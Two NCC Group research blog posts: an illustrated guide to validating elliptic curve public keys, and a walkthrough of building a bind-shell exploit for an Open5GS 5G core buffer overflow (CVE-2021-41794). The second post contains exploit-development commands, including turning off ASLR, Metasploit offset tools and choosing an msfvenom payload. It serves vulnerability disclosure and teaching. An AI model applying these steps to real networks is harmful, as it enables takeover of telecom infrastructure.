NCC Group Research

An Illustrated Guide to Elliptic Curve Cryptography Validation

By: Paul Bottinelli

Elliptic Curve Cryptography (ECC) has become the de facto standard for protecting modern communications. ECC is widely used to perform asymmetric cryptography operations, such as establishing shared secrets or computing digital signatures. However, insufficient validation of public keys and parameters is still a frequent cause of confusion, leading to serious vulnerabilities such as leakage of secret keys, signature malleability or interoperability issues.

The purpose of this blog post is to provide an illustrated description of the typical failures related to elliptic curve validation and how to avoid them in a clear and accessible way. Even though a number of standards [1, 2] mandate these checks, implementations frequently fail to perform them.

While this blog post describes some of the necessary concepts behind elliptic curve arithmetic and cryptographic protocols, it does not cover elliptic curve cryptography in detail, which has already been done extensively. The following blog posts are good resources on the topic: A (Relatively Easy To Understand) Primer on Elliptic Curve Cryptography by Nick Sullivan and Elliptic Curve Cryptography: a gentle introduction by Andrea Corbellini.

In elliptic curve cryptography, public keys are frequently sent between parties, for example to establish shared secrets using Elliptic Curve Diffie–Hellman (ECDH). The goal of public key validation is to ensure that keys are legitimate (by providing assurance that there is an existing, associated private key) and to prevent attacks that leak information about the private key of a legitimate user.

Issues related to public key validation seem to routinely occur in two general areas. First, transmitting public keys over digital communication channels requires converting them to bytes. However, converting these bytes back to an elliptic curve point is a common source of issues, notably due to canonicalization. Second, once public keys have been decoded, some mathematical subtleties of the elliptic curve operations may also lead to different types of attacks. We will discuss these subtleties in the remainder of this blog post.

TL;DR

In general [3], vulnerabilities may arise when applications fail to check that:

  1. The point coordinates are lower than the field modulus.
  2. The coordinates correspond to a valid curve point.
  3. The point is not the point at infinity.
  4. The point is in the correct subgroup.
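The first three checks are cheap arithmetic tests. The sketch below (a minimal illustration, not a vetted library; the function name and the use of `None` for the point at infinity are our own conventions) validates a decoded point against the secp256k1 parameters, for which the fourth check is trivially satisfied since the cofactor is 1:

```python
# Minimal sketch of validation checks 1-3, using the secp256k1 parameters.
# The point at infinity is represented as None by convention.
p = 2**256 - 2**32 - 977   # field modulus
a, b = 0, 7                # curve equation: y^2 = x^3 + 7

def validate_point(P):
    if P is None:
        return False       # check 3: reject the point at infinity
    x, y = P
    if not (0 <= x < p and 0 <= y < p):
        return False       # check 1: coordinates must be canonical field elements
    if (y * y - (pow(x, 3, p) + a * x + b)) % p != 0:
        return False       # check 2: coordinates must satisfy the curve equation
    return True            # check 4 (subgroup) would need a scalar multiplication

# secp256k1 base point, as a quick sanity check
Gx = 0x79BE667EF9DCBBAC55A06295CE870B07029BFCDB2DCE28D959F2815B16F81798
Gy = 0x483ADA7726A3C4655DA4FBFC0E1108A8FD17B448A68554199C47D08FFB10D4B8
```

With these parameters, `validate_point((Gx, Gy))` succeeds, while a non-canonical encoding such as `(Gx + p, Gy)` or an off-curve pair such as `(Gx, Gy + 1)` is rejected.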

An Illustrated Guide to Validating ECC Curve Points

Elliptic curves are curves given by an equation of the form y^2 = x^3 + ax + b (called short Weierstrass form). Elliptic curve cryptography deals with the group of points on that elliptic curve, namely, a set of (x, y) values satisfying the curve equation.

These values, called coordinates (more specifically, affine coordinates), are defined over a field. For use in cryptography, we work with coordinates defined over a finite field. For the purpose of this blog post, we will concentrate our efforts on the field of integers modulo p, with p a prime number (and p > 3), which we call the field modulus. Elements of this field can take any value between 0 and p - 1. In the following figure, the white squares depict valid field elements while grey squares represent the elements that are larger than the field modulus.

Mathematically, a value larger than the field modulus is equivalent to its reduced form (that is, in the 0 to p-1 range, see congruence classes), but in practice these ambiguities may lead to complex issues [4].
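The ambiguity is easy to see in code: two different integer encodings can denote the same field element, so implementations that skip the range check may disagree on which encodings are valid (toy example, illustrative only):

```python
p = 2**255 - 19          # e.g. the Curve25519 field modulus
x = 5
x_noncanonical = x + p   # a different integer in the same congruence class

# Mathematically equivalent after reduction...
assert x_noncanonical % p == x
# ...but the raw encodings differ, inviting implementation disagreements.
assert x_noncanonical != x
```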

In ECC, a public key is simply a point on the curve. Since curve points are generally first encoded to byte arrays before being transmitted, the first step when receiving an encoded curve point is to decode it. This is what we identified earlier as the first area of confusion and potential source of vulnerabilities. Specifically, what happens when the integer representations of the coordinates we decoded are larger than the field modulus?

This is the first common source of issues and the reason for our first validation rules:

Check that the point coordinates are lower than the field modulus.

What can go wrong? If the recipient does not enforce that coordinates are lower than the field modulus, some elliptic curve point operations may be incorrectly computed. Additionally, different implementations may have diverging interpretations of the validity of a point, possibly leading to interoperability issues, which can be a critical issue in consensus-driven deployments.

In the figure below, this means that the point coordinates should be rejected if they are not in the white area in the bi-dimensional plane.

Since both coordinates are elements of this finite field, it might seem that an elliptic curve point could theoretically take any value in the white area above. However, not all pairs of (x, y) values in this plane are valid curve points; remember that they need to satisfy the curve equation y^2 = x^3 + ax + b in order to be on the curve. We represent the valid curve points in blue in the figure below [5]. The number of points on the curve is referred to as the curve order.

This is another common source of issues and where our second validation rule arises:

Check that the point coordinates correspond to a valid curve point (i.e. that the coordinates satisfy the curve equation).

What can go wrong? If the recipient of a public key fails to verify that the point is on the curve, an attacker may be able to perform a so-called invalid curve attack [6]. Because some point operations are independent of the value of b in the elliptic curve equation, a malicious peer may carefully select a different curve (by varying the value of b) on which security is reduced (namely, the discrete logarithm problem is easier than on the original curve). By then sending a point on that new curve (and provided the legitimate peer fails to verify that the point coordinates satisfy the curve equation), the attacker may eventually recover the legitimate peer’s secret.
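The premise of the attack can be demonstrated on a toy curve: the affine doubling formula below uses the coefficient a but never b, so it happily operates on a point of any curve y^2 = x^3 + ax + b' sharing the same a (toy parameters of our own choosing, illustrative only):

```python
p, a, b = 97, 2, 3   # legitimate toy curve: y^2 = x^3 + 2x + 3 over GF(97)

def ec_double(P):
    x, y = P
    # Tangent slope: note that b never appears in the formula.
    s = (3 * x * x + a) * pow(2 * y, -1, p) % p
    x3 = (s * s - 2 * x) % p
    return (x3, (s * (x - x3) - y) % p)

# Take a point on a *different* curve with the same a but b' != b...
b_evil = 5
Q = next((x, y) for x in range(p) for y in range(1, p)
         if (y * y - (x**3 + a * x + b_evil)) % p == 0)

# ...the doubling code accepts it, and the result stays on the attacker's curve.
x2, y2 = ec_double(Q)
assert (y2 * y2 - (x2**3 + a * x2)) % p == b_evil
```

This is why the attacker gets to choose b: unless the recipient checks the curve equation, all subsequent arithmetic silently takes place on the attacker's weaker curve.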

In practice, curve points are rarely sent as pairs of coordinates, which we call uncompressed. Indeed, the y-coordinate can be recovered by solving the curve equation for a given x, which is why point compression was developed. Point compression reduces the amount of data to be transmitted by (almost) half, at the cost of a few more operations necessary to solve the curve equation. However, solving the equation for a given x may have different outcomes. It can either result in:

  • no solutions (in case the value x^3 + ax + b is not a quadratic residue, i.e. has no square root in the field), in which case the point should be rejected; or
  • two solutions, (x, y) and (x, -y), due to the fact that y^2 = (-y)^2. However, all coordinates must lie in the 0 \ldots p-1 range, which are all positive numbers. Since we’re working in the field of integers modulo p, that negative y-coordinate is actually equivalent to the field element p - y, which lies in the correct range.

Hence, when compressing a point, an additional byte of data is used to distinguish the correct y-coordinate. Specifically, point encoding (following Section 2.3.3 of SEC 1) works by prepending a byte to the coordinate(s) specifying which encoding rule is used, as follows:

  • Compressed point: 0x02 || x if y is even and 0x03 || x if y is odd;
  • Uncompressed point: 0x04 || x || y. [7]

Any other value for the first byte should result in the curve point being rejected. Point compression has a significant side benefit: it ensures that the point is on the curve, since implementations should reject the point when the curve equation has no solution for the given x.
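As a sketch, decompression for a curve whose field modulus satisfies p ≡ 3 (mod 4), such as secp256k1, can compute the square root with a single modular exponentiation (illustrative code, not a vetted implementation; the function name is our own):

```python
# Decompress an SEC 1 encoded secp256k1 point (p % 4 == 3 holds for this curve).
p = 2**256 - 2**32 - 977
a, b = 0, 7

def decompress(data: bytes):
    prefix, x = data[0], int.from_bytes(data[1:], "big")
    if prefix not in (0x02, 0x03):
        raise ValueError("unsupported prefix byte")
    if x >= p:
        raise ValueError("x is not a canonical field element")   # rule 1
    rhs = (pow(x, 3, p) + a * x + b) % p
    y = pow(rhs, (p + 1) // 4, p)        # square root, valid since p % 4 == 3
    if y * y % p != rhs:
        raise ValueError("x is not on the curve")  # rhs is not a quadratic residue
    if (y & 1) != (prefix & 1):
        y = p - y                        # pick the root matching the parity byte
    return x, y

# Example: recover the secp256k1 base point from its compressed form (02 || Gx).
Gx = 0x79BE667EF9DCBBAC55A06295CE870B07029BFCDB2DCE28D959F2815B16F81798
x, y = decompress(bytes([0x02]) + Gx.to_bytes(32, "big"))
```

For field moduli with p ≡ 1 (mod 4), a general square-root algorithm such as Tonelli–Shanks is needed instead.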

Now, the careful reader may have realized that the set of points in the figure above is incomplete. In order for this set to form a group (in the mathematical sense), and be useful in cryptography, it needs to be supplemented with an additional element, the point at infinity. This point, also called neutral element or additive identity, is the element \mathcal{O} such that for any point P on our elliptic curve, P + \mathcal{O} = \mathcal{O} + P = P. The figure below shows the previous set of points on our arbitrary curve with the addition of the point at infinity, which we (artificially) positioned slightly outside our plane, in the bottom left corner.

Since the point at infinity is not on the curve, it does not have well-defined x and y coordinates like other curve points. As such, its representation had to be constructed artificially [8]. Standards (such as SEC 1: Elliptic Curve Cryptography) define the encoding of the point at infinity to be a single octet of value zero. Confusingly, implementations sometimes also use other encodings for the point at infinity, such as a number of zero bytes equal to the size of the coordinates.

Implementations sometimes fail to properly distinguish the point at infinity, and this is where our third validation rule comes from:

Check that the point is not the point at infinity.

What can go wrong? Since multiplying the point at infinity by any scalar results in the point at infinity, an adversary may force the result of a key agreement to be zero if the legitimate recipient fails to check that the point received is not the point at infinity. This goes against the principle of contributory behavior, where some protocols require that both parties contribute to the outcome of an operation such as a key exchange. Failure to enforce this check may have additional negative consequences in other protocols.

Recall that the curve order, say N, corresponds to the number of points on the curve. To make matters more complicated, the group of points on an elliptic curve may be further divided into multiple subgroups. Lagrange’s theorem tells us that any subgroup of the group of points on the elliptic curve has an order dividing the order of the original group. Namely, the size (i.e. the number of points) of every subgroup divides the total number of points on the curve.

In cryptography, to ensure that the discrete logarithm problem is hard, curves are selected in such a way that they contain one subgroup with a large prime order, say n, in which all computations are performed. Some curves (such as the NIST curves [9], or the curve secp256k1 [10] used in Bitcoin) were carefully designed such that n = N, namely the prime-order group in which we perform operations is the full group of points on the elliptic curve. In contrast, the popular Curve25519 has curve order N = 8n, which means that points on this curve can belong to the large prime-order subgroup of size n, or to a subgroup with a much smaller order, of size 2, 4 or 8, for example [11]. The value h such that h = N/n is called the cofactor; it can be thought of as the ratio between the total number of points on the curve and the size of the prime-order subgroup in which cryptographic operations are performed.

To illustrate this notion, consider the figure below in which we have further subdivided our fictitious set of elliptic curve points into two groups. When performing operations on elliptic curve points, we want to stick with operations on points in the larger, prime-order subgroup, identified by the blue points below.

And this is where our last validation rule comes from:

Check that the point is in the correct subgroup.

This can be achieved by checking that nP = \mathcal{O}. Indeed, a consequence of Lagrange’s theorem is that any group element multiplied by the order of that group is equal to the neutral element. If P were in the small subgroup, multiplying it by n would not equal \mathcal{O}. This highlights another possible method for checking that the point belongs to the correct subgroup; one could also check that hP \neq \mathcal{O}. Contrary to the previous validation rules, this check is considerably more expensive since it requires a point multiplication, and as such is sometimes (detrimentally) skipped for efficiency purposes.
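The nP = \mathcal{O} check can be sketched with textbook double-and-add scalar multiplication (affine coordinates, None standing in for the point at infinity; illustrative only, and in particular not constant-time):

```python
# Verify nP == O on secp256k1 with textbook double-and-add.
p = 2**256 - 2**32 - 977
a = 0
n = 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFEBAAEDCE6AF48A03BBFD25E8CD0364141

def ec_add(P, Q):
    if P is None: return Q               # O + Q = Q
    if Q is None: return P               # P + O = P
    (x1, y1), (x2, y2) = P, Q
    if x1 == x2 and (y1 + y2) % p == 0:
        return None                      # P + (-P) = O
    if P == Q:
        s = (3 * x1 * x1 + a) * pow(2 * y1, -1, p) % p   # tangent slope
    else:
        s = (y2 - y1) * pow(x2 - x1, -1, p) % p          # chord slope
    x3 = (s * s - x1 - x2) % p
    return (x3, (s * (x1 - x3) - y1) % p)

def scalar_mult(k, P):
    R = None                             # running sum, starts at O
    while k:
        if k & 1:
            R = ec_add(R, P)
        P = ec_add(P, P)
        k >>= 1
    return R

G = (0x79BE667EF9DCBBAC55A06295CE870B07029BFCDB2DCE28D959F2815B16F81798,
     0x483ADA7726A3C4655DA4FBFC0E1108A8FD17B448A68554199C47D08FFB10D4B8)
assert scalar_mult(n, G) is None         # nG = O: G lies in the order-n subgroup
```

Since secp256k1 has cofactor 1, every valid curve point passes this test; on a curve with a non-trivial cofactor, a point of small order would fail it.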

What can go wrong? A malicious party sending a point in the orange subgroup, for example as part of an ECDH key agreement protocol, would result in the honest party performing operations limited to that small subgroup. Thus, if the recipient of a public key failed to check that the point was in the correct subgroup, the attacker could perform a so-called small subgroup attack (also known as subgroup confinement attacks) and learn information about the legitimate party’s private key [12].

Does that apply to all curves?

While the presentation above is fairly generic and applies in a general sense to all curves, some curves and associated constructions were created to prevent some of these issues by design.

NIST curves (e.g. P-256) and the Bitcoin curve (secp256k1)

These curves have a cofactor value of 1 (namely, h = 1). As such, there is only one large subgroup of prime order and all curve points belong to that group. Hence, once the first 3 steps in our validation procedure have been performed, the last step is superfluous.

Curve25519

Curve25519, proposed by Daniel J. Bernstein and specified in RFC 7748, is a popular curve which is notably used in TLS 1.3 for key agreement.

Although Curve25519 has a cofactor of 8, some functions using this curve were designed to prevent cofactor-related issues. For example, the X25519 function used to perform key agreement using Curve25519 mandates specific checks and performs key agreement using only x-coordinates, such that invalid curve attacks are avoided. Additionally, the governing RFC states in Section 5 that

Implementations MUST accept non-canonical values and process them as if they had been reduced modulo the field prime. The non-canonical values are 2^255 - 19 through 2^255 - 1 for X25519.

This seems to address most issues discussed in this post. However, there has been some debate [13] over the claimed optional nature of these checks.
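RFC 7748's decoding of an X25519 u-coordinate simply masks the most significant bit; any remaining non-canonical value is then reduced implicitly by the subsequent arithmetic modulo p = 2^255 - 19. A minimal sketch of the RFC's decodeUCoordinate:

```python
def decode_u_coordinate(u_bytes: bytes) -> int:
    """Sketch of RFC 7748 decodeUCoordinate for X25519 (little-endian)."""
    assert len(u_bytes) == 32
    u = int.from_bytes(u_bytes, "little")
    # Mask the top bit; values in [2^255 - 19, 2^255 - 1] are accepted here
    # and reduced modulo p by the later field arithmetic.
    return u & ((1 << 255) - 1)
```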

With the popularity of Curve25519 and the desire for cryptographers to design more exotic protocols with it, the cofactor value of 8 resurfaced as a potential source of problems. Ristretto was designed as a solution to the cofactor pitfalls. Ristretto is an abstraction layer, on top of Curve25519, which essentially restricts curve points to a prime-order subgroup.

Double-Odd Elliptic Curves

Finally, a strong contender in the secure-by-design curve category is the Double-Odd family of elliptic curves, recently proposed by Thomas Pornin. These curves specify a strict and economical encoding, preventing issues with canonicalization and, even though their cofactor is not trivial, a prime order group is defined on them, similar in spirit to Ristretto’s approach, preventing subgroup confinement attacks.

Conclusion

With the ubiquitous use of elliptic curve cryptography, failure to validate elliptic curve points can be a critical issue which is sadly still commonly uncovered during cryptography reviews. While standards and academic publications provide ample directions to correctly validate curve points, implementations still frequently fail to follow these steps. For example, a vulnerability nicknamed Curveball was reported in January 2020, which allowed attackers to perform spoofing attacks in Microsoft Windows by crafting public points. Recently, we also uncovered a critical vulnerability in a number of open-source ECDSA libraries, in which the verification function failed to check that the signature was non-zero, allowing attackers to forge signatures on arbitrary messages, see the technical advisory Arbitrary Signature Forgery in Stark Bank ECDSA Libraries.

This illustrated guide will hopefully serve as an accessible reference on why and how point validation should be performed.

Thank you

The author would like to thank Eric Schorn and Giacomo Pope for their detailed review and helpful feedback.


References

  1. Standards for efficient cryptography, SEC 1: Elliptic Curve Cryptography, Section 3.2.2.1 Elliptic Curve Public Key Validation Primitive.
  2. NIST Special Publication 800-56A, Section 5.6.2.3.2 FFC Partial Public-Key Validation Routine and 5.6.2.3.3 ECC Full Public-Key Validation Routine.
  3. That is, unless using an elliptic curve that was designed specifically to address these potential issues, we will come back to that at the end of this blog post.
  4. Specifically, implementations may handle values that are larger than the field modulus in different ways. They may reject non-reduced values (i.e., non-canonical encodings), accept non-reduced values and reduce them modulo the prime order, or accept non-reduced values and discard the most significant bit(s). An interesting example happened with the cryptocurrency Zcash, where different implementations had distinct interpretations regarding the validity of curve points. Some details can be found in a blog post by Henry de Valence, as well as in a public report following a cryptography review performed by NCC Group.
  5. Note that this figure does not represent an actual elliptic curve; it is just an arbitrary diagram designed for illustrative purposes.
  6. Ingrid Biehl, Bernd Meyer and Volker Müller. “Differential Fault Attacks on Elliptic Curve Cryptosystems”. In: Advances in Cryptology – CRYPTO 2000, 20th Annual International Cryptology Conference, Santa Barbara, California, USA, August 20-24, 2000, Proceedings. 2000, pp. 131–146.
  7. Note that there is a hybrid form starting in 0x06 defined in ANSI X9.62, but this format is very rarely used in practice.
  8. Note that some curves and alternate point representations (for instance, when working in projective coordinates) may allow the point at infinity to have a well-defined representation.
  9. Standardized in FIPS PUB 186-4: Digital Signature Standard (DSS).
  10. Standardized in SEC 2: Recommended Elliptic Curve Domain Parameters.
  11. The paper Taming the many EdDSAs provides some very interesting discussions around ambiguities in the Ed25519 signature verification equations (which is based on Curve25519). These ambiguities led to different interpretations of the validity of signatures, which resulted in implementations returning different validity results for some signatures, which could be critical in consensus-driven applications.
  12. Chae Hoon Lim and Pil Joong Lee. “A Key Recovery Attack on Discrete Log-based Schemes Using a Prime Order Subgroup”. In: Advances in Cryptology – CRYPTO ’97, 17th Annual International Cryptology Conference, Santa Barbara, California, USA, August 17-21, 1997, Proceedings. 1997, pp. 249–263.
  13. See https://moderncrypto.org/mail-archive/curves/2017/000896.html.


Exploit the Fuzz – Exploiting Vulnerabilities in 5G Core Networks

By: nccmarktedman

Following on from our previous blog post ‘The Challenges of Fuzzing 5G Protocols’, in this post, we demonstrate how an attacker could use the results from the fuzz testing to produce an exploit and potentially gain access to a 5G core network.

In this blog post we will be using the PFCP bug (CVE-2021-41794) we’d previously found using Fuzzowski 5GC in Open5GS[1] (present from versions 1.0.0 through 2.3.3), to demonstrate the potential security risk a buffer overflow can cause.

We will cover how to examine the bug for possible exploit, how to create the actual exploit code, and how it is integrated into a PFCP message.  Finally, we will discuss mitigations that can help reduce/eliminate this type of attack.

In this blog we have taken steps to simplify the process in an effort to make it available to a wider audience.  We have used a proof of concept to explain the techniques and turned off some of the standard mitigations to reduce the complexity of the exploit.

Background

Previously we used Fuzzowski 5GC to fuzz the UPF component of the Open5GS project (version 2.2.9).  The fuzz testing found a buffer overflow bug in the function ‘ogs_fqdn_parse’.  This type of bug is reasonably easy to exploit, and the basic idea is shown below.

We will use this bug to show how a malicious payload can be written to the variable ‘dnn’, the variable overflowed to set the return address, and execution gained to take control of the UPF process.

Test Environment

To make the exploit development easier and to keep the technical details as simple as possible, a few security mitigations were disabled:

  • ASLR – Address Space Layout Randomization
  • Stack protection
  • Stack non-exec (NX)

Many systems run with insufficient mitigations, so testing exploitation in this context makes sense for showing how exploitation might be possible against one of these platforms. Furthermore, most of these mitigations can be bypassed given the right bug conditions. Although we didn’t investigate bypassing these mitigations for this research, it may be possible that certain manifestations of the bug allow for exploitation on a more hardened platform.

The following environments and tools were used to test and develop the exploit:

  • Open5GS version 2.2.9 – The target
  • Ubuntu 20.04 VM – Host for Open5GS
  • Kali Linux 2021.1 VM – Tools for exploit development
  • MsfVenom – Metasploit standalone payload generator
  • Msf-pattern_create – Unique string pattern generator
  • Msf-pattern_offset – Finds substring in string generated by msf-pattern_create
  • GDB Debugger – For examining the execution
  • Visual Code – Source code editor
  • Netcat – To test the exploit

In the past, low-level knowledge of assembly was often required to write an exploit, but with the advent of tools such as MsfVenom, generating exploit code is now ridiculously easy. However, there are still instances where custom shellcode is required to develop a working exploit, for example if space is limited.

Where to Start?

First, we need to find exactly where the buffer overflow occurs and why.  This stage has already been covered so please refer to the previous blog post ‘The Challenges of Fuzzing 5G Protocols’ for more details.

For a quick recap we have a buffer created on the stack called ‘dnn’ which is defined as 100 bytes long.

This buffer is passed into the function ‘ogs_fqdn_parse’ as a pointer along with the source data buffer (message->pdi.network_instance.data) containing the value of ‘internet’ which is 8 bytes long (message->pdi.network_instance.len).

When the ‘ogs_fqdn_parse’ function executes, the memcpy copies data from the source to the destination overflowing the destination buffer by 5 bytes in this example.  By reviewing the source code, we can see that we have control over the contents of the ‘src’ parameter and the ‘length’ parameter.  Also note that we have read beyond the end of the ‘src’ buffer which could be used to leak information, but that’s a different type of bug that we won’t explore here.

On examining the function ‘ogs_fqdn_parse’, it’s possible to see that we can write as much data as we like into the destination buffer.  The only issue we face when trying to insert assembly code is the insertion of a ‘.’ character or the null termination byte after the memcpy at lines 302 and 304 above.

So, although we can write as much data as we want, we are limited to how much code can be inserted if we want to keep this example as simple as possible.  As the variable ‘len’ is an unsigned byte the maximum number of bytes for assembly code is limited to 255 bytes.  We could of course write some custom assembly code to jump over the ‘.’ characters but this adds extra complication.

Before rushing off to code our exploit, it is always worth looking at the other places this function is used, as there may be a better opportunity to exploit the bug.  So let’s search the source code for other calls to ‘ogs_fqdn_parse’.

As we can see this function is used by several other components in the 5G core which could also be potential targets.  This opens up the attack vectors as we now have potentially multiple 5G core components that can be exploited in a similar fashion.  While the fuzzer only found a single bug in one component (in this case the UPF), examining the code shows that other components such as the AMF, MME, SMF, SGWC may be susceptible to the same issue.  This also highlights that fuzz testing alone will not necessarily find all vulnerabilities; in this example, we fuzzed the AMF and MME and failed to discover the same bug.

It is worth pointing out that some of these other calls are not exploitable due to size checks before the call to ‘ogs_fqdn_parse’.  For example, in the following code from the function ‘ogs_nas_5gs_decode_dnn’, the size of the input data is checked against the size of the data structure ‘ogs_nas_dnn_t’ on line 122 below.  This prevents the function ‘ogs_fqdn_parse’ from being called if the input data is larger than the destination structure, which prevents the stack from being corrupted.

For our example exploit we will continue to use the original location of the buffer overflow discovered by our fuzzer: the function ‘ogs_pfcp_handle_create_pdr’, which is called when the UPF processes a PFCP Session Establishment Request message.

Proof of Concept

To demonstrate the exploit, it is easier to create a simple test program before attempting to exploit the actual component where the stack may be more complicated.

The code below shows a simple test program structured similarly to how the function is called in the actual UPF application.  Initially we want to determine the stack offset of the return address for the function ‘test’ in our example.

This simple test program creates a variable ‘dnn’ on the stack along with a unique string of characters for the ‘name’ variable.  The function ‘ogs_fqdn_parse’ is then called to cause the stack corruption and overwrite the return address of the ‘test’ function.  This should cause the test program to crash as the value written to the return address is unlikely to be a valid memory address.

Generating the data for the name variable is done by using the Metasploit Framework tool ‘pattern_create.rb’.  This generates a unique sequence of characters that can later be used to find the relevant offset for the return address.

Command to generate unique string of characters:
$ /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 1000

The function ‘ogs_fqdn_parse’ is expecting the data to start with a single byte indicating the length of the data to follow.  To copy the 1000 bytes of data that has been generated onto the stack, we need to split it up and specify the relevant sizes in bytes.
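A small helper (our own, hypothetical; not part of Fuzzowski or Open5GS) shows this length-prefixed layout, with each chunk capped at 255 bytes because the length field is a single unsigned byte:

```python
def encode_labels(data: bytes, max_label: int = 255) -> bytes:
    """Split data into length-prefixed chunks, as ogs_fqdn_parse consumes them."""
    out = bytearray()
    for i in range(0, len(data), max_label):
        part = data[i:i + max_label]
        out.append(len(part))        # single-byte length prefix per chunk
        out += part
    return bytes(out)

# The benign case from the bug description: a "dnn" value of "internet".
assert encode_labels(b"internet") == b"\x08internet"
```

With this maximum label size, a 1000-byte pattern becomes four length-prefixed chunks (255 + 255 + 255 + 235), or 1004 bytes on the wire.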

Before we can run the program, we need to switch off ASLR (Address Space Layout Randomization).

$ sudo bash -c "echo 0 > /proc/sys/kernel/randomize_va_space"

Then enable unlimited file size for core files.

$ ulimit -c unlimited

If we compile the test application and run it, we get the following output:

$ cc -g test_stack.c -o test_stack

$ ./test_stack 
dnn address: 0x7fffffffdfb0
zsh: segmentation fault (core dumped)  ./test_stack

As expected, the program crashed because we wrote 1000 bytes of data over important stack variables required for normal program execution.  The observant amongst you will have realized that we actually wrote 1010 bytes to the stack, but we will come back to that later.

So now we have run the test program and it has generated a core file, it’s now time to examine the crash and find the offset to the magic return address.  We will now examine the core file using the debugger gdb.

Using the following command let’s load the core file with gdb so we can examine it:

$ gdb ./test_stack --core=core

The following image shows the stack layout before the memcpy is executed.  Looking at the layout, we should only need to write approximately 116 bytes to overwrite the return address, so writing 1000 bytes is a bit of overkill for the proof of concept.  However, the stack in the UPF may have more variables between the variable ‘dnn’ and the return address, which may require us to write a reasonable amount of data to the stack before we reach the location of the return address we are trying to change.

All we need to do now is use another Metasploit Framework tool called ‘pattern_offset.rb’ to calculate the offset of the return address.  To do this we take the address stored in the saved RIP register associated with the function ‘test’ stack frame (i.e. 0x4131654130654139), and use it as the query parameter for ‘pattern_offset.rb’.

$ /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -l 1000 -q 0x4131654130654139
[*] Exact match at offset 119

An exact match is found at offset 119.  We need to be careful here as this is not the actual offset of the return address.  119 is the offset of part of our string from the beginning of our unique string.  As mentioned earlier we actually wrote 1010 bytes to the stack, which we now need to consider when calculating the final offset of the return address.

We can check this by displaying the first 128 bytes of the stack variable ‘dnn’ in our example program.

Using the following command in the debugger to show the contents of ‘dnn’
(gdb) x/128bb dnn 

Note there is a gap between the end of the ‘dnn’ variable and the frame pointer which is due to 16-byte alignment requirements.

Creating the Exploit

This is where in the good old days you would crack open the ‘Intel 64 and IA-32 Architectures Software Developer’s Manual[2]’ and start hand crafting some assembly code.  Fortunately, these days the Metasploit Framework has made this task very simple indeed.

The Metasploit Framework tool ‘MsfVenom’ can generate a number of different payloads/exploits by simply providing a few command line options.

We have chosen the payload ‘linux/x64/shell_bind_tcp’ which generates code to start a shell prompt when a connection is made to the specified port 5600.  The option to append code to exit the program has also been included.  The ‘-f’ option is used to generate C code.

As we can see from the output of ‘MsfVenom’, the payload is conveniently only 94 bytes long.  This means that we can copy it directly to the stack without worrying about the ‘.’ or null character messing up our assembly code. If the payload was longer than 255 bytes (the maximum size of a chunk we can copy) we would need to write some custom assembly code to skip over the ‘.’ character that is inserted after each chunk of data is copied.

If we now replace the unique ASCII string in our test program with the output from ‘MsfVenom’ and the return address, we should have a working exploit!

Exploiting the UPF Component

Now that we have a working proof of concept, we know our exploit works.  All we need to do now is repeat the process of finding the return address when returning from the function ‘ogs_pfcp_handle_create_pdr’, calculate the offset of the ‘dnn’ buffer and finally create a suitable PFCP Session Establishment Request message to send the exploit to the UPF.

Sounds straightforward enough; however, the reality is a little more complicated.  To start with, the function ‘ogs_pfcp_handle_create_pdr’ is a bit more complicated than our simple ‘test’ function.  From the point where we overflow the stack variable ‘dnn’, we need execution to continue until the end of the function ‘ogs_pfcp_handle_create_pdr’ for our exploit code to be executed.  As there are several other function calls and variable assignments, we need these to complete without crashing the UPF.

The main problem we have is the variable ‘pdr’ which is a pointer on the stack.  This will be overwritten when we overwrite the return address because it is at a higher address on the stack compared to the ‘dnn’ variable.

To fix this we need to find the offset of the variable ‘pdr’ and assign it to something sensible when we overflow the variable ‘dnn’.  We can use the Metasploit tools ‘pattern_create.rb’ and ‘pattern_offset.rb’ again to determine this offset.  Once the variable ‘pdr’ has been fixed up, the function then executes to completion and returns, executing our exploit code.

The value of ‘pdr’ is at a fixed offset in our example as we have disabled ASLR.  This means that we can hard code the value in our exploit once we have calculated it.

To create the PFCP Session Establish Request message we used Fuzzowski 5GC and set the Network Instance Information Element to contain our exploit code.

We then tested the exploit by using Fuzzowski 5GC to send the PFCP messages to the UPF.

After successfully testing the exploit, we used the POC (Proof of Concept) feature of Fuzzowski 5GC to generate a standalone Python exploit script.  This saves a lot of time compared to hand-crafting the messages and having to calculate nested length fields, checksums, etc.  Below is a section of the PFCP Session Establish Request message containing our exploit, the ‘pdr’ pointer fix and the return address.

Mitigations

To simplify this blog post, and hopefully make it understandable to a wider audience, the standard mitigations that help prevent these kinds of bugs from being exploited were disabled.  This enabled a much simpler exploit process to be followed, allowing us to demonstrate the potential damage that can be done by exploiting buffer overflows.

The following mitigations would have made the demonstrated exploit much harder, but not necessarily impossible:

  • ASLR – Address Space Layout Randomization
  • Stack protection
  • Stack execution prevention

ASLR – Address Space Layout Randomization

Randomizing the load addresses of various parts of an application makes it difficult for an attacker to locate the parts of the application they want to target.  For example, most operating systems implement some form of ASLR, which randomizes the addresses of the stack, heap, and library modules.  Generally, applications need to be compiled with support for ASLR.

Stack Protection

By enabling stack protection options when compiling an application, extra code can be inserted before and after each function in an attempt to detect stack corruption within the function.  This may prevent further exploitation to some degree, but it will cause the application to exit, which is not necessarily desirable.

Stack Execution Prevention

By preventing the area of memory that contains the stack from being executable, the type of exploit demonstrated would not be possible.  There are however other techniques that can be used to circumvent this protection.

Other Mitigations

There are several other mitigations that could help prevent this type of bug in the first place.  For example:

  • Better functional/system testing
  • Better coding standards/practices
  • Use of more secure versions of functions to replace functions like memcpy
  • Code reviews
  • Use of static analysis tools
  • Fuzz Testing
  • Design with security in mind

The Bug Fix

In version 2.3.4 of Open5GS, a fix was implemented for our originally reported bug (CVE-2021-41794).  While this patch fixed the reported bug, there are still issues with the function ‘ogs_fqdn_parse’.

As the ‘src’ buffer is effectively controlled by the attacker, the above issues are possible depending upon how the function ‘ogs_fqdn_parse’ is called.  If size checks have been done before calling the function, then it’s not so much of an issue; however, it is asking for trouble to rely on the caller of the function to validate what’s passed in to prevent the buffer overflow.

The current patch in version 2.3.4 is susceptible to the second issue of writing a null byte beyond the end of the destination buffer.

This just highlights the importance of using all possible mitigations to avoid releasing vulnerable code in the first place.

The original PFCP bug (CVE-2021-41794) was concerned with the calculation of the ‘len’ variable at line 328 above, and its use in the memcpy at line 334 without being validated. The expectation was for the function ‘ogs_fqdn_parse’ to be completely rewritten instead of an ‘if’ statement being added to fix only the original bug.

